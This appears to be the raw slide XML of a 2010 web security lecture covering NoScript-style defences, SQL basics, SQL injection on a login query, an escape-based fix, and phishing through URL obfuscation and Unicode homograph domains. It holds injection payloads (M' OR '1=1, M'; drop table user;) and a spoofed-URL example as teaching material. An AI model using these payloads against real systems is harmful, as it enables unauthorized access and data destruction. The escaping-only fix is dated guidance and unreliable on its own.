              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>NoScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t> - Firefox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>Application-level firewall: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Analyze HTML pages for hyperlinks that might lead to leakage of sensitive information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Stop bad requests using a set of connection rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>Auditing system: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Monitor execution of JavaScript code and compare the operations against high-level policies to detect malicious behavior</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean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742AE8-78D3-4948-9FE3-E4B3296DCBA7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8033D-8445-49F5-B906-C56A4FE4BF00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SQL Injection Attack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Many web applications take user input from a form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Often this user input is used literally in the construction of a SQL query submitted to a database. For example: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dirty="0" smtClean="0"/>
              <a:t>SELECT user FROM table </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WHERE name = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’;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 SQL injection attack involves placing SQL statements in the user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A470BE-6E98-42DF-BBA2-7DCC05A6C6BC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D79110-FBC1-4D55-8FC9-92F848989990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SQL: Standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Query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lets you access and manage (Query) databases </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A database is a large collection of data organized in tables for rapid search and retrieval, with fields and columns</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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37E7-A630-4D9F-8F60-2347C4966DB0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/17/2010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Storage Confidentiality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9074-FD2C-4344-8997-BA6EDF99276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2743200" y="4343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First</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>_Name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Last_Name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Code_ID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Bernardo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Palazzi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Roberto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Tamassia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Alex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Heitzman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543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590800" y="4114800"/>
            <a:ext cx="1524000" cy="2286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267200"/>
            <a:ext cx="1550424" cy="95410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A field or</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Column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057400" y="4724400"/>
            <a:ext cx="53340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2362200" y="5029200"/>
            <a:ext cx="6019800" cy="533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5808" y="5675293"/>
            <a:ext cx="1601592" cy="95410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A Record </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>or Row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V="1">
            <a:off x="1981200" y="5334000"/>
            <a:ext cx="3810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781800" y="3896380"/>
            <a:ext cx="2065052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Table: CS166</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Syntax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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT statement is used to select data FROM one or more tables in a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Result-set is stored in a result table</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WHERE clause is used to filter records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37E7-A630-4D9F-8F60-2347C4966DB0}" type="datetime1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Storage Confidentiality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9074-FD2C-4344-8997-BA6EDF99276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7200" y="1295400"/>
            <a:ext cx="8178800" cy="1828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SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(s) or * </a:t>
            </a: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FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2800" kern="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a: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WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2800" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> operator value</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr kumimoji="1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Syntax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37E7-A630-4D9F-8F60-2347C4966DB0}" type="datetime1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Storage Confidentiality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9074-FD2C-4344-8997-BA6EDF99276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7200" y="1295400"/>
            <a:ext cx="8178800" cy="2819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SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(s) or * </a:t>
            </a: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FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2800" kern="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a: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WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2800" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> operator value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3200" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr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ASC|DESC</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Book Antiqua" pitchFamily="18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3200" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LIMIT </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>starting row and number of lines</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFC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kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Book Antiqua" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr kumimoji="1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93516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ORDER BY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order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>following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or more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>fields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>LIMIT  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>allows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retrieve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> just a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>certain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>numbers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records</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>rows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400" dirty="0" smtClean="0"/>
              <a:t>Login Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3400" dirty="0" smtClean="0"/>
              <a:t>Query</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3400" dirty="0" smtClean="0"/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 lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Standard query to authenticate users:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>select * from users where user='$usern' AND pwd='$password'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Classic SQL injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Server side code sets variables $username and $passwd from user input to web form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Variables passed to SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>select * from users where user='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>' AND pwd='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Special strings can be entered by attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>select * from users where user='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M' OR '1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>' AND pwd='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M' OR '1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Result: access obtained without password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CC9ED-D862-45C2-BA9C-75B74F95E89D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14D61-ACD4-43C4-AF80-BE24D3FB4157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Some improvements …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43014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Query modify:</a:t>
            </a:r>
          </a:p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select user,pwd from users </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>where user='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>$usern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
          </a:p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b="1" dirty="0" smtClean="0"/>
              <a:t>$usern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M' OR '1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>”;</a:t>
            </a:r>
          </a:p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Result: the entire table</a:t>
            </a:r>
          </a:p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We can check:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338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only one tuple result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338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dirty="0" smtClean="0"/>
              <a:t>formal correctness of the result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>$usern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>=“M' ; drop table user;”?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56D808-4F59-4684-B9F7-B77276FA4AE5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7D279-1E70-41C3-A0AF-F81725D084D4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smtClean="0"/>
              <a:t>Correct Solution</a:t>
            </a:r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 marL="431800" indent="-323850" defTabSz="449263" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>We can use an Escape method, where all “malicious” characters will be changed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Escape(“t ' c”) gives as a result “t \' c”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>			select user,pwd from users where user='$usern'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>			$usern=escape(“M' ;drop table user;”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The result is the safe query:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>			select user,pwd from users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>			where user='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M\' drop table user;\'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>'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1AB396-069E-47A2-8273-B34D9FB87FFD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72FEE-6FB7-4A93-8BA5-5987C6438F35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Phishing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66800"/>
            <a:ext cx="4419600" cy="5410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Forged web pages created to fraudulently acquire sensitive information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User typically solicited to access phished page from spam email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Most targeted sites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Financial services (e.g., Citibank)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Payment services (e.g., PayPal)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Auctions (e..g, eBay)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45K unique phishing sites detected monthly in 2009 </a:t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APWG Phishing Trends Reports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill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Methods to avoid detection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Misspelled URL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URL obfuscation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Removed or forged address bar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7056A0-63DD-42FC-ADAB-0FC8BB7AAA28}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/17/2010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C4D87-DC66-4622-8DAE-20B201DD1DC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151" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect b="5634"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="1219200"/>
            <a:ext cx="4153696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83225"/>
            <a:ext cx="8229600" cy="72423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Phishing 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F7EB6-929D-4AED-BFEB-C4A13CCC5F9F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693BF-9AED-4B24-9769-2787F5AFB03E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31650"/>
            <a:ext cx="8763000" cy="5233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2590800" y="6102350"/>
            <a:ext cx="3810000" cy="2948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750"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="6767FF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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.anti-phishing.com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URL Obfuscation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45720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Properties of page in previous slide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/>
              <a:t>Actual URL different from spoofed URL displayed in address bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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URL escape character attack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/>
              <a:t>Old versions of Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>xplorer did not display anything past the Esc or null character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solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Displayed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>actual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t> site</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trusted.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>%01%00@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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Unicode attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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Domains names with Unicode characters  can be registered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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Identical, or very similar, graphic rendering for some characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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E.g., Cyrillic and Latin “a”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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Phishing attack on p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>ypal.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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Current version of browsers display </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Punycode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, an ASCII-encoded version of Unicode: www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xn--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>pypal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-4ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.com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2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
